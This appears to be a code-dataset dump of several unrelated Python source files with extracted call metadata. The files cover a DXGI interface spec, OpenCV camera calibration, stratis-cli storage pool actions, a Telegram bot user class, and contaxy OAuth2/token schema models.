StdMethod(HRESULT, 'EnumAdapterByGpuPreference', [(UINT, 'Adapter'), (DXGI_GPU_PREFERENCE, 'GpuPreference'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
dxgi.addInterfaces([
IDXGIFactory6,
IDXGIAdapter4,
IDXGIOutput6,
])
dxgi.addFunctions([
StdFunction(HRESULT, "DXGIDeclareAdapterRemovalSupport", [], sideeffects=False),
])
| [] |
nitchith/CarND-Advanced-Lane-Lines | code/camera_calib.py | 8e9e4d369f95f2076aa3b99c9015ac95c20037fc | import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
def camera_calibrate(images_list, nx=9, ny=6, show_corners=False):
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((ny*nx,3), np.float32)
objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob(images_list)
if show_corners:
fig = plt.figure(figsize=(30, 30))
rows = 5
cols = 4
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (nx,ny),None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Draw and display the corners
if show_corners:
img = cv2.drawChessboardCorners(img, (nx,ny), corners, ret)
ax = plt.subplot(rows, cols, idx + 1)
ax.set_title(fname)
plt.imshow(img)
return cv2.calibrateCamera(objpoints, imgpoints, gray.shape[1::-1], None, None) | [((8, 11, 8, 42), 'numpy.zeros', 'np.zeros', ({(8, 20, 8, 29): '(ny * nx, 3)', (8, 31, 8, 41): 'np.float32'}, {}), '((ny * nx, 3), np.float32)', True, 'import numpy as np\n'), ((16, 13, 16, 35), 'glob.glob', 'glob.glob', ({(16, 23, 16, 34): 'images_list'}, {}), '(images_list)', False, 'import glob\n'), ((43, 11, 43, 83), 'cv2.calibrateCamera', 'cv2.calibrateCamera', ({(43, 31, 43, 40): 'objpoints', (43, 42, 43, 51): 'imgpoints', (43, 53, 43, 70): 'gray.shape[1::-1]', (43, 72, 43, 76): 'None', (43, 78, 43, 82): 'None'}, {}), '(objpoints, imgpoints, gray.shape[1::-1], None, None)', False, 'import cv2\n'), ((19, 14, 19, 42), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((25, 14, 25, 31), 'cv2.imread', 'cv2.imread', ({(25, 25, 25, 30): 'fname'}, {}), '(fname)', False, 'import cv2\n'), ((26, 15, 26, 51), 'cv2.cvtColor', 'cv2.cvtColor', ({(26, 28, 26, 31): 'img', (26, 32, 26, 50): 'cv2.COLOR_BGR2GRAY'}, {}), '(img, cv2.COLOR_BGR2GRAY)', False, 'import cv2\n'), ((29, 23, 29, 68), 'cv2.findChessboardCorners', 'cv2.findChessboardCorners', ({(29, 49, 29, 53): 'gray', (29, 55, 29, 62): '(nx, ny)', (29, 63, 29, 67): 'None'}, {}), '(gray, (nx, ny), None)', False, 'import cv2\n'), ((38, 22, 38, 75), 'cv2.drawChessboardCorners', 'cv2.drawChessboardCorners', ({(38, 48, 38, 51): 'img', (38, 53, 38, 60): '(nx, ny)', (38, 62, 38, 69): 'corners', (38, 71, 38, 74): 'ret'}, {}), '(img, (nx, ny), corners, ret)', False, 'import cv2\n'), ((39, 21, 39, 53), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(39, 33, 39, 37): 'rows', (39, 39, 39, 43): 'cols', (39, 45, 39, 52): 'idx + 1'}, {}), '(rows, cols, idx + 1)', True, 'import matplotlib.pyplot as plt\n'), ((41, 16, 41, 31), 'matplotlib.pyplot.imshow', 'plt.imshow', ({(41, 27, 41, 30): 'img'}, {}), '(img)', True, 'import matplotlib.pyplot as plt\n')] |
MathiasStadler/docker-jenkins-scripted | python-jenkins/yaml_read_config/custom_log.py | 3f908987ab0428dd2239b524150ff3b65c71104c | """ module logging"""
# logging
| [] |
stratis-storage/stratis-cli | src/stratis_cli/_actions/_pool.py | 16efcfe50558785ff44a1570ca554edb2006f8d2 | # Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Pool actions.
"""
# isort: STDLIB
import os
from collections import defaultdict
# isort: THIRDPARTY
from justbytes import Range
from .._constants import PoolMaintenanceErrorCode
from .._errors import (
StratisCliAggregateError,
StratisCliEngineError,
StratisCliIncoherenceError,
StratisCliInUseOtherTierError,
StratisCliInUseSameTierError,
StratisCliNameConflictError,
StratisCliNoChangeError,
StratisCliPartialChangeError,
StratisCliPartialFailureError,
)
from .._stratisd_constants import BlockDevTiers, PoolActionAvailability, StratisdErrors
from ._connection import get_object
from ._constants import TOP_OBJECT
from ._formatting import get_property, print_table, size_triple, to_hyphenated
from ._utils import get_clevis_info
def _generate_pools_to_blockdevs(managed_objects, to_be_added, tier):
"""
Generate a map of pools to which block devices they own
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param tier: tier to search for blockdevs to be added
:type tier: _stratisd_constants.BlockDevTiers
:returns: a map of pool names to sets of strings containing blockdevs they own
:rtype: dict of str * frozenset of str
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, MOPool, devs, pools
pool_map = dict(
(path, str(MOPool(info).Name()))
for (path, info) in pools().search(managed_objects)
)
pools_to_blockdevs = defaultdict(list)
for modev in (
modev
for modev in (
MODev(info)
for (_, info) in devs(props={"Tier": tier}).search(managed_objects)
)
if str(modev.Devnode()) in to_be_added
):
pools_to_blockdevs[pool_map[modev.Pool()]].append(str(modev.Devnode()))
return dict(
(pool, frozenset(blockdevs)) for pool, blockdevs in pools_to_blockdevs.items()
)
def _check_opposite_tier(managed_objects, to_be_added, other_tier):
"""
Check whether specified blockdevs are already in the other tier.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param other_tier: the other tier, not the one requested
:type other_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliInUseOtherTierError: if blockdevs are used by other tier
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, other_tier
)
if pools_to_blockdevs != {}:
raise StratisCliInUseOtherTierError(
pools_to_blockdevs,
BlockDevTiers.DATA
if other_tier == BlockDevTiers.CACHE
else BlockDevTiers.CACHE,
)
def _check_same_tier(pool_name, managed_objects, to_be_added, this_tier):
"""
Check whether specified blockdevs are already in the tier to which they
are to be added.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param this_tier: the tier requested
:type this_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliPartialChangeError: if blockdevs are used by this tier
:raises StratisCliInUseSameTierError: if blockdevs are used by this tier in another pool
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, this_tier
)
owned_by_current_pool = frozenset(pools_to_blockdevs.get(pool_name, []))
owned_by_other_pools = dict(
(pool, devnodes)
for pool, devnodes in pools_to_blockdevs.items()
if pool_name != pool
)
if owned_by_current_pool != frozenset():
raise StratisCliPartialChangeError(
"add to cache" if this_tier == BlockDevTiers.CACHE else "add to data",
to_be_added.difference(owned_by_current_pool),
to_be_added.intersection(owned_by_current_pool),
)
if owned_by_other_pools != {}:
raise StratisCliInUseSameTierError(owned_by_other_pools, this_tier)
def _fetch_locked_pools_property(proxy):
"""
Fetch the LockedPools property from stratisd.
:param proxy: proxy to the top object in stratisd
:return: a representation of unlocked devices
:rtype: dict
:raises StratisCliEngineError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
return Manager.Properties.LockedPools.Get(proxy)
class PoolActions:
"""
Pool actions.
"""
@staticmethod
def create_pool(namespace):
"""
Create a stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliNameConflictError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
names = pools(props={"Name": pool_name}).search(managed_objects)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
if list(names) != []:
raise StratisCliNameConflictError("pool", pool_name)
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.DATA)
clevis_info = get_clevis_info(namespace)
((changed, (_, _)), return_code, message) = Manager.Methods.CreatePool(
proxy,
{
"name": pool_name,
"redundancy": (True, 0),
"devices": blockdevs,
"key_desc": (
(True, namespace.key_desc)
if namespace.key_desc is not None
else (False, "")
),
"clevis_info": (False, ("", ""))
if clevis_info is None
else (True, clevis_info),
},
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to create the specified pool %s but stratisd "
"reports that it did not actually create the pool"
)
% pool_name
)
@staticmethod
def init_cache(namespace): # pylint: disable=too-many-locals
"""
Initialize the cache of an existing stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
(pool_object_path, _) = next(
pools(props={"Name": pool_name})
.require_unique_match(True)
.search(managed_objects)
)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE)
((changed, devs_added), return_code, message) = Pool.Methods.InitCache(
get_object(pool_object_path), {"devices": blockdevs}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs as cache "
"to pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def list_pools(namespace):
"""
List all stratis pools.
"""
# pylint: disable=import-outside-toplevel
from ._data import MOPool, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pools_with_props = [
MOPool(info) for objpath, info in pools().search(managed_objects)
]
def physical_size_triple(mopool):
"""
Calculate the triple to display for total physical size.
The format is total/used/free where the display value for each
member of the tuple are chosen automatically according to justbytes'
configuration.
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:returns: a string to display in the resulting list output
:rtype: str
"""
total_physical_size = Range(mopool.TotalPhysicalSize())
total_physical_used = get_property(mopool.TotalPhysicalUsed(), Range, None)
return size_triple(total_physical_size, total_physical_used)
def properties_string(mopool):
"""
Make a string encoding some important properties of the pool
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:param props_map: a map of properties returned by GetAllProperties
:type props_map: dict of str * any
"""
def gen_string(has_property, code):
"""
Generate the display string for a boolean property
:param has_property: whether the property is true or false
:type has_property: bool or NoneType
:param str code: the code to generate the string for
:returns: the generated string
:rtype: str
"""
if has_property == True: # pylint: disable=singleton-comparison
prefix = " "
elif has_property == False: # pylint: disable=singleton-comparison
prefix = "~"
# This is only going to occur if the engine experiences an
# error while calculating a property or if our code has a bug.
else: # pragma: no cover
prefix = "?"
return prefix + code
props_list = [(mopool.HasCache(), "Ca"), (mopool.Encrypted(), "Cr")]
return ",".join(gen_string(x, y) for x, y in props_list)
format_uuid = (
(lambda mo_uuid: mo_uuid) if namespace.unhyphenated_uuids else to_hyphenated
)
def alert_string(mopool):
"""
Alert information to display, if any
:param mopool: object to access pool properties
:returns: string w/ alert information, "" if no alert
:rtype: str
"""
action_availability = PoolActionAvailability.from_str(
mopool.AvailableActions()
)
error_codes = action_availability.pool_maintenance_error_codes()
return ", ".join(sorted(str(code) for code in error_codes))
tables = [
(
mopool.Name(),
physical_size_triple(mopool),
properties_string(mopool),
format_uuid(mopool.Uuid()),
alert_string(mopool),
)
for mopool in pools_with_props
]
print_table(
["Name", "Total Physical", "Properties", "UUID", "Alerts"],
sorted(tables, key=lambda entry: entry[0]),
["<", ">", ">", ">", "<"],
)
@staticmethod
def destroy_pool(namespace):
"""
Destroy a stratis pool.
If no pool exists, the method succeeds.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Manager.Methods.DestroyPool(
proxy, {"pool": pool_object_path}
)
# This branch can be covered, since the engine will return an error
# if the pool can not be destroyed because it has filesystems.
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to destroy the specified pool %s but "
"stratisd reports that it did not actually "
"destroy the pool requested"
)
% namespace.pool_name
)
@staticmethod
def rename_pool(namespace):
"""
Rename a pool.
:raises StratisCliEngineError:
:raises StratisCliNoChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import ObjectManager, Pool, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.current})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Pool.Methods.SetName(
get_object(pool_object_path), {"name": namespace.new}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed:
raise StratisCliNoChangeError("rename", namespace.new)
@staticmethod
def add_data_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified data devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.DATA
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddDataDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the data tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def add_cache_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified cache devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddCacheDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the cache tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def unlock_pools(namespace):
"""
Unlock all of the encrypted pools that have been detected by the daemon
but are still locked.
:raises StratisCliIncoherenceError:
:raises StratisCliNoChangeError:
:raises StratisCliAggregateError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
proxy = get_object(TOP_OBJECT)
locked_pools = _fetch_locked_pools_property(proxy)
if locked_pools == {}: # pragma: no cover
raise StratisCliNoChangeError("unlock", "pools")
# This block is not covered as the sim engine does not simulate the
# management of unlocked devices, so locked_pools is always empty.
errors = [] # pragma: no cover
for uuid in locked_pools: # pragma: no cover
(
(is_some, unlocked_devices),
return_code,
message,
) = Manager.Methods.UnlockPool(
proxy, {"pool_uuid": uuid, "unlock_method": namespace.unlock_method}
)
if return_code != StratisdErrors.OK:
errors.append(
StratisCliPartialFailureError(
"unlock", "pool with UUID %s" % uuid, error_message=message
)
)
if is_some and unlocked_devices == []:
raise StratisCliIncoherenceError(
(
"stratisd reported that some existing devices are locked but "
"no new devices were unlocked during this operation"
)
)
if errors != []: # pragma: no cover
raise StratisCliAggregateError("unlock", "pool", errors)
@staticmethod
def explain_code(namespace):
"""
Print an explanation of pool error code.
"""
error_code = PoolMaintenanceErrorCode.from_str(namespace.code)
assert error_code is not None
print(error_code.explain())
| [((64, 25, 64, 42), 'collections.defaultdict', 'defaultdict', ({(64, 37, 64, 41): 'list'}, {}), '(list)', False, 'from collections import defaultdict\n'), ((176, 31, 176, 49), 'os.path.abspath', 'os.path.abspath', ({(176, 47, 176, 48): 'p'}, {}), '(p)', False, 'import os\n'), ((234, 31, 234, 49), 'os.path.abspath', 'os.path.abspath', ({(234, 47, 234, 48): 'p'}, {}), '(p)', False, 'import os\n'), ((452, 31, 452, 49), 'os.path.abspath', 'os.path.abspath', ({(452, 47, 452, 48): 'p'}, {}), '(p)', False, 'import os\n'), ((507, 31, 507, 49), 'os.path.abspath', 'os.path.abspath', ({(507, 47, 507, 48): 'p'}, {}), '(p)', False, 'import os\n')] |
Esenin/telegram_vk_pipe_bot | synchrobot/chat_user.py | db92fe062a121beebbc386975660d5a76f1b396c | # -*- coding: utf-8 -*-
# Author: Ivan Senin
import calendar
import time
import datetime as dt
import json
class User(object):
def __init__(self, id, name, last_seen, want_time, muted, username="", additional_keys="{}"):
super(User, self).__init__()
self.id = id
self.name = name
self.username = username
self._last_seen = last_seen
self._want_time = want_time
self._muted = muted
self.dirty = True
self.other_keys = json.loads(additional_keys) if additional_keys else {}
def get_seen(self): return self._last_seen
def set_seen(self, seen):
self._last_seen = seen
self.dirty = True
last_seen = property(get_seen, set_seen)
def get_want_time(self): return self._want_time
def set_want_time(self, new_val):
self._want_time = new_val
self.dirty = True
want_time = property(get_want_time, set_want_time)
def get_muted(self): return self._muted
def set_muted(self, new_val):
self._muted = new_val
self.dirty = True
muted = property(get_muted, set_muted)
def update_seen_time(self):
self.last_seen = calendar.timegm(time.gmtime())
def __str__(self):
seen_str = dt.datetime.fromtimestamp(self.last_seen).strftime('%Y-%m-%d %H:%M:%S')
return "User: ({0}{1}, id: {2}, last_seen: {3}, want_time: {4}, muted: {5})".format(
self.name.encode('utf-8'), " (" + self.username + ")" if self.username else "", self.id, seen_str,
self.want_time, self.muted)
def serialized_keys(self):
return json.dumps(self.other_keys)
| [((54, 9, 54, 36), 'json.dumps', 'json.dumps', ({(54, 20, 54, 35): 'self.other_keys'}, {}), '(self.other_keys)', False, 'import json\n'), ((19, 20, 19, 47), 'json.loads', 'json.loads', ({(19, 31, 19, 46): 'additional_keys'}, {}), '(additional_keys)', False, 'import json\n'), ((44, 35, 44, 48), 'time.gmtime', 'time.gmtime', ({}, {}), '()', False, 'import time\n'), ((47, 13, 47, 54), 'datetime.datetime.fromtimestamp', 'dt.datetime.fromtimestamp', ({(47, 39, 47, 53): 'self.last_seen'}, {}), '(self.last_seen)', True, 'import datetime as dt\n')] |
Felipe-Renck/contaxy | backend/src/contaxy/schema/auth.py | 532d1f01aad1ea8155bc10216acedca601d37889 | from datetime import datetime, timezone
from enum import Enum
from typing import Dict, List, Optional
import pydantic
from fastapi import HTTPException, Path, status
from pydantic import BaseModel, EmailStr, Field
from contaxy.schema.exceptions import ClientValueError
from contaxy.schema.shared import MAX_DESCRIPTION_LENGTH
from contaxy.utils.fastapi_utils import as_form
USERS_KIND = "users"
ADMIN_ROLE = "roles/admin"
USER_ROLE = "roles/user"
class AccessLevel(str, Enum):
# Map to: select, insert, update, delete
READ = "read" # Viewer, view: Allows admin access , Can only view existing resources. Permissions for read-only actions that do not affect state, such as viewing (but not modifying) existing resources or data.
WRITE = "write" # Editor, edit, Contributor : Allows read/write access , Can create and manage all types of resources but can’t grant access to others. All viewer permissions, plus permissions for actions that modify state, such as changing existing resources.
ADMIN = "admin" # Owner : Allows read-only access. Has full access to all resources including the right to edit IAM, invite users, edit roles. All editor permissions and permissions for the following actions
# UNKNOWN = "unknown" # Deny?
@classmethod
def load(cls, access_level: str) -> "AccessLevel":
try:
return cls(access_level.strip().lower())
except ValueError:
raise ClientValueError(f"Access level is unknown {access_level}")
# return cls.UNKNOWN
class TokenPurpose(str, Enum):
USER_API_TOKEN = "user-api-token"
PROJECT_API_TOKEN = "project-api-token"
SERVICE_ACCESS_TOKEN = "service-access-token"
LOGIN_TOKEN = "login-token"
REFRESH_TOKEN = "refresh-token" # For user sessions
# DEPLOYMENT_TOKEN = "deployment-token"
contaxy_token_purposes = {purpose for purpose in TokenPurpose}
class TokenType(str, Enum):
SESSION_TOKEN = "session-token"
API_TOKEN = "api-token"
class AccessToken(BaseModel):
token: str = Field(
...,
example="f4528e540a133dd53ba6809e74e16774ebe4777a",
description="API Token.",
)
token_type: TokenType = Field(
...,
example=TokenType.API_TOKEN,
description="The type of the token.",
)
subject: str = Field(
...,
example="users/dklqmomr2c8dx9cpb202dsqku",
description="Identifies the principal that is the subject of the token. Usually refers to the user to which the token is issued to.",
)
scopes: List[str] = Field(
...,
example=["projects#read"],
description="List of scopes associated with the token.",
)
created_at: Optional[datetime] = Field(
None,
description="Creation date of the token.",
)
expires_at: Optional[datetime] = Field(
None,
example="2021-04-25T10:20:30.400+02:30",
description="Date at which the token expires and, thereby, gets revoked.",
)
class ApiToken(AccessToken):
description: Optional[str] = Field(
None,
example="Token used for accesing project resources on my local machine.",
max_length=MAX_DESCRIPTION_LENGTH,
description="Short description about the context and usage of the token.",
)
created_by: Optional[str] = Field(
None,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="ID of the user that created this token.",
)
token_purpose: Optional[str] = Field(
None,
example=TokenPurpose.LOGIN_TOKEN,
description="The purpose of the token.",
)
class AuthorizedAccess(BaseModel):
authorized_subject: str
resource_name: Optional[str] = None
access_level: Optional[AccessLevel] = None
access_token: Optional[AccessToken] = None
# Oauth Specific Code
class OAuth2TokenGrantTypes(str, Enum):
PASSWORD = "password"
REFRESH_TOKEN = "refresh_token"
CLIENT_CREDENTIALS = "client_credentials"
AUTHORIZATION_CODE = "authorization_code"
# TODO: Replaced with pydantic class
# class OAuth2TokenRequestForm:
# """OAuth2 Token Endpoint Request Form."""
# def __init__(
# self,
# grant_type: OAuth2TokenGrantTypes = Form(
# ...,
# description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
# ),
# username: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s username."
# ),
# password: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s password."
# ),
# scope: Optional[str] = Form(
# None,
# description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
# ),
# client_id: Optional[str] = Form(
# None,
# description="The client identifier issued to the client during the registration process",
# ),
# client_secret: Optional[str] = Form(
# None,
# description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
# ),
# code: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
# ),
# redirect_uri: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
# ),
# refresh_token: Optional[str] = Form(
# None,
# description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
# ),
# set_as_cookie: Optional[bool] = Form(
# False,
# description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
# ),
# ):
# self.grant_type = grant_type
# self.username = username
# self.password = password
# self.scopes = []
# if scope:
# self.scopes = str(scope).split()
# self.client_id = client_id
# self.client_secret = client_secret
# self.code = code
# self.redirect_uri = redirect_uri
# self.refresh_token = refresh_token
# self.state = state
# self.set_as_cookie = set_as_cookie
@as_form
class OAuth2TokenRequestFormNew(BaseModel):
"""OAuth2 Token Endpoint Request Form."""
grant_type: OAuth2TokenGrantTypes = Field(
...,
description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
)
username: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s username."
)
password: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s password."
)
scope: Optional[str] = Field(
None,
description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
)
client_id: Optional[str] = Field(
None,
description="The client identifier issued to the client during the registration process",
)
client_secret: Optional[str] = Field(
None,
description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
)
code: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
)
redirect_uri: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
)
refresh_token: Optional[str] = Field(
None,
description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
)
state: Optional[str] = Field(
None,
description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
)
set_as_cookie: Optional[bool] = Field(
False,
description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
)
class OAuthToken(BaseModel):
token_type: str = Field(
..., description="The type of token this is, typically just the string `bearer`"
)
access_token: str = Field(..., description="The access token string.")
expires_in: Optional[int] = Field(
None,
description="The expiration time of the access token in seconds.",
)
refresh_token: Optional[str] = Field(
None, description="API token to refresh the sesion token (if it expires)."
)
scope: Optional[str] = Field(
None, description="The scopes contained in the access token."
)
id_token: Optional[str] = Field(
None,
description="OpenID Connect ID Token that encodes the user’s authentication information.",
)
class OAuthTokenIntrospection(BaseModel):
active: bool = Field(
...,
description="Indicator of whether or not the presented token is currently active.",
)
scope: Optional[str] = Field(
None,
description="A space-delimited list of scopes.",
)
client_id: Optional[str] = Field(
None,
description="Client identifier for the OAuth 2.0 client that requested this token.",
)
username: Optional[str] = Field(
None,
description="Human-readable identifier for the resource owner who authorized this token.",
)
token_type: Optional[str] = Field(
None,
description="Type of the token as defined in Section 5.1 of OAuth 2.0 [RFC6749].",
)
exp: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token will expire, as defined in JWT [RFC7519].",
)
iat: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token was originally issued, as defined in JWT [RFC7519].",
)
nbf: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token is not to be used before, as defined in JWT [RFC7519].",
)
sub: Optional[str] = Field(
None,
description="Subject of the token, as defined in JWT [RFC7519]. Usually a machine-readable identifier of the resource owner who authorized this token.",
)
aud: Optional[str] = Field(
None,
description="Service-specific string identifier or list of string identifiers representing the intended audience for this token, as defined in JWT [RFC7519].",
)
iss: Optional[str] = Field(
None,
description="String representing the issuer of this token, as defined in JWT [RFC7519].",
)
jti: Optional[str] = Field(
None,
description="String identifier for the token, as defined in JWT [RFC7519].",
)
uid: Optional[str] = Field(
None,
description="The user ID. This parameter is returned only if the token is an access token and the subject is an end user.",
)
